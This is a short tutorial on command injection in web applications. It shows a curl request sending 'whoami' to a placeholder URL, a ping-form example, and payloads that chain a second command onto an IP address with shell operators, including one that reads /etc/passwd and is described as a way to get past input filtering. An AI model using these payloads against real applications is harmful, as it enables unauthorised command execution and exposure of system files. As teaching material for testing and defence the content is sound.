Command injection

Allow to execute arbitrary system commands on a host operating system via a vulnerable application. Normally happens when a web application takes a user-supplied input and passes it directly to a shell interpreter.

We can find a typical example of this vulnerability as follows:

• When internally using functions like system or shell_exec which pass input to an internal command interpreter

#We send a petition with a command
curl -X POST http://url/? -d "cmd=whoami"
#If being handled by system(), it will respond with the output of the command, letting us we can talk to the internal shell

---

• In some cases, the application will receive input and redirect it to an internal command executed in the server shell

#A form receives the IP as input and executes the ping command
8.8.8.8
#Example output
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=117 time=26.4 ms
...
#Ww see that it works like the following command inside
ping $input

---

• We can abuse this input to add other commands using the command operators

8.8.8.8; ls -la
8.8.8.8 & ls -la    
8.8.8.8 && ls -la
8.8.8.8 | ls -la
8.8.8.8 || ls -la

---

• Sometimes it could be sanitized to detect these symbols, so to avoid detection, we can combine operators and commands into a single string, which helps bypass filtering

8.8.8.8|cat /etc/passwd